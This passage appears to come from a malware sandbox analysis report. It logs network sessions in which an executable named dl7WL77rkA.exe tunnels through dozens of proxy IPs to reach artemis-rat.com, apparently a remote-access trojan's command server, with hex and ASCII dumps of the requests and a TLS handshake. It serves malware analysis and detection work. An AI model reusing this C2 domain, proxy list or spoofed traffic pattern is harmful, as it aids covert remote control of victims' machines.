                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.823081017 CET536INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 556
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE a
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.823093891 CET169INData Raw: 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e
                                                                                                                                                                                                                                                            Data Ascii: nd Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1867192.168.2.55507047.91.65.2331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.467351913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.523102999 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1868192.168.2.554109162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.479585886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1869192.168.2.55515623.19.244.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.480792046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1870192.168.2.554290103.180.198.13081813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.481189013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1871192.168.2.55453238.54.101.25490003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.544573069 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083408117 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.682040930 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902421951 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108223915 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.395950079 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.608269930 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.922334909 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1872192.168.2.555131116.199.168.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.561597109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1873192.168.2.555157193.239.58.9280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.564378977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1874192.168.2.555134115.127.31.6680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.582941055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1875192.168.2.551161203.153.125.13654243876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.602478027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1876192.168.2.551252128.199.196.31265793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.609740973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1877192.168.2.555158185.132.242.21280833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.632680893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1878192.168.2.55137251.75.126.150366943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.634123087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.701988935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1879192.168.2.554620132.148.16.169113203876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.634123087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1880192.168.2.5514005.252.23.20631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.634295940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702030897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.780484915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.811732054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1881192.168.2.554526181.110.214.13431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.640584946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.456773996 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1882192.168.2.55147145.117.179.179359423876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.644520044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.701865911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702769995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.708507061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1883192.168.2.55516045.11.95.16552123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.644766092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1884192.168.2.555161211.222.252.18781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.645026922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1885192.168.2.55516245.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.645205021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1886192.168.2.55138881.17.94.50343003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.645689964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702027082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.780502081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1887192.168.2.55455195.66.138.2188803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.650310040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1888192.168.2.555163103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.679281950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1889192.168.2.55147414.143.145.35803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.757256031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811239004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.236718893 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.329828024 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c da 9e e4 98 3e aa 2a 2d 6b a3 63 37 69 af 02 7d f2 c6 1e 16 29 29 d3 ed ac 51 0e 14 04 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: el>*-kc7i}))Q*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.831386089 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee 6c db ed 82 7e 38 a6 ce 85 78 18 83 6c c8 00 09 86 c4 a1 14 da ad 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                                                                                                                                                                                            Data Ascii: C?el~8xlDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.831562996 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                                                                                                                                                                                            Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.250891924 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
